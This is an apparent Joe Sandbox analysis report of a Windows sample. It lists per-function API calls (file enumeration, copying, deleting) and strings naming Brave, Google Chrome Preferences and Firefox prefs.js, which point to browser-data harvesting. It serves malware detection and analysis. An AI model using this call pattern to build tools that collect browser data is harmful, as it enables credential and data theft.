                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                          • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: 01y$Brave$Google Chrome$Preferences$\Brave\Preferences
                                          • API String ID: 3334442632-4181439275
                                          • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                          • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                          • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                          • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                          APIs
                                          • wsprintfA.USER32 ref: 022D3B33
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022D3B4A
                                          • lstrcat.KERNEL32(?,?), ref: 022D3B9C
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 022D3BAE
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 022D3BC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022D3ECE
                                          • FindClose.KERNEL32(000000FF), ref: 022D3EE3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID: p0y
                                          • API String ID: 1125553467-1563381289
                                          • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                          • Instruction ID: 1066e3c39b1f81d2f411ea1698320819f831a69e9a64e3360de4029f00056572
                                          • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                          • Instruction Fuzzy Hash: 30A14CB5A50218ABDB34DFE4DC84FEE737AEF49300F444588A60D96184DB759B84CF62
                                          APIs
                                          • wsprintfA.USER32 ref: 0041492C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                          • FindClose.KERNEL32(000000FF), ref: 00414B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s$%s\%s$%s\*
                                          • API String ID: 180737720-445461498
                                          • Opcode ID: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                          • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                          • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                          • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022CC15C
                                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 022CC1B4
                                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 022CC1CA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CCA26
                                          • FindClose.KERNEL32(000000FF), ref: 022CCA38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: 01y
                                          • API String ID: 3334442632-883880616
                                          • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                          • Instruction ID: 6838eef1c4913893f4c1992d87d2389059b9b57752a1db7473e3c252ff4a5332
                                          • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                          • Instruction Fuzzy Hash: 6D428472A20344ABCB18FBF4DD95EED737AAF94300F50466DA50A92188EF349B48CF51
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                          • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                          • wsprintfA.USER32 ref: 004145A6
                                          • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                          • FindClose.KERNEL32(000000FF), ref: 004146A0
                                          • lstrcatA.KERNEL32(?,00793010,?,00000104), ref: 004146C5
                                          • lstrcatA.KERNEL32(?,00799E00), ref: 004146D8
                                          • lstrlenA.KERNEL32(?), ref: 004146E5
                                          • lstrlenA.KERNEL32(?), ref: 004146F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                          • String ID: %s\%s$%s\*
                                          • API String ID: 13328894-2848263008
                                          • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                          • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                          • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                          • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                          APIs
                                          • wsprintfA.USER32 ref: 022D4B93
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022D4BAA
                                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022D4BD8
                                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022D4BEE
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022D4DE4
                                          • FindClose.KERNEL32(000000FF), ref: 022D4DF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID:
                                          • API String ID: 180737720-0
                                          • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                          • Instruction ID: b9aaf4416e7997b520c2cf88d084e511b77004a1ba1774869d2526450b502d8f
                                          • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                          • Instruction Fuzzy Hash: 176174B5950218ABCB20EFE0DD48FEA73BDFB49700F04468CB60992144EB75A785CF91
                                          APIs
                                          • wsprintfA.USER32 ref: 00413EC3
                                          • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                          • FindClose.KERNEL32(000000FF), ref: 00414081
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 180737720-4073750446
                                          • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                          • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                          • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                          • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022D47E7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D47EE
                                          • wsprintfA.USER32 ref: 022D480D
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022D4824
                                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022D4852
                                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022D4868
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022D48F2
                                          • FindClose.KERNEL32(000000FF), ref: 022D4907
                                          • lstrcat.KERNEL32(?,0064A524), ref: 022D492C
                                          • lstrcat.KERNEL32(?,0064A22C), ref: 022D493F
                                          • lstrlen.KERNEL32(?), ref: 022D494C
                                          • lstrlen.KERNEL32(?), ref: 022D495D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                          • String ID:
                                          • API String ID: 671575355-0
                                          • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                          • Instruction ID: ba0894c112826841ce49ab20c12b670ecba8938e0678e20dd9e74fc91c0c0c67
                                          • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                          • Instruction Fuzzy Hash: E55184B5590218ABCB20EBF0DD89FED737DEB58300F404698E60992194DB75DB85CF91
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                          • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID: 1y$(Py$4@$\*.*
                                          • API String ID: 2325840235-1778078017
                                          • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                          • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                          • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                          • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                          APIs
                                          • wsprintfA.USER32 ref: 0040ED3E
                                          • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                          • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                          • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: 1y$%s\*.*
                                          • API String ID: 180737720-2430506319
                                          • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                          • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                          • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                          • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                          APIs
                                          • wsprintfA.USER32 ref: 022D412A
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022D4141
                                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022D416F
                                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022D4185
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022D42D3
                                          • FindClose.KERNEL32(000000FF), ref: 022D42E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID:
                                          • API String ID: 180737720-0
                                          • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                          • Instruction ID: 6501806b08a4fed1177d4c872606f0604e1a06ec39a6c55b95085a1529e145ce
                                          • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                          • Instruction Fuzzy Hash: EA5160B6910218BBCB24FBF0DC85EEA737DBB48300F00468CA64996084DB75DB89CF95
                                          APIs
                                          • wsprintfA.USER32 ref: 022CEFA5
                                          • FindFirstFileA.KERNEL32(?,?), ref: 022CEFBC
                                          • StrCmpCA.SHLWAPI(?,00421538), ref: 022CF012
                                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 022CF028
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CF515
                                          • FindClose.KERNEL32(000000FF), ref: 022CF52A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextwsprintf
                                          • String ID: 1y
                                          • API String ID: 180737720-680022488
                                          • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                          • Instruction ID: 1ca196779bf9abba4127a6ffd933e51f55a8475974a1aca6187a0ff5a0075863
                                          • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                          • Instruction Fuzzy Hash: B1E1FE729217589ADB18FBA4DD51EEE733AAF64300F4042DDB10A62199EF346F89CF50
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022CE0C5
                                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 022CE115
                                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 022CE12B
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 022CE647
                                          • FindClose.KERNEL32(000000FF), ref: 022CE659
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                          • String ID: 1y$(Py
                                          • API String ID: 2325840235-3814263721
                                          • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                          • Instruction ID: 8a0ef9a0c31247a6117b3ea5f823eb80146446be3f2978b4b126225db92abeaf
                                          • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                          • Instruction Fuzzy Hash: F3F1CF715207189ACB19FBA4DD95EEE733ABF25300F5442DEA04A62194EF346F89CF50
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                          • String ID: prefs.js
                                          • API String ID: 3334442632-3783873740
                                          • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                          • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                          • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                          • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                          • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                          • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID: (Py$@0y$\*.*$@
                                          • API String ID: 433455689-2564832314
                                          • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                          • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                          • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                          • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                          • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                          • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                          • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                          • FindClose.KERNEL32(000000FF), ref: 00401E32
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          Strings
                                          Memory Dump Source
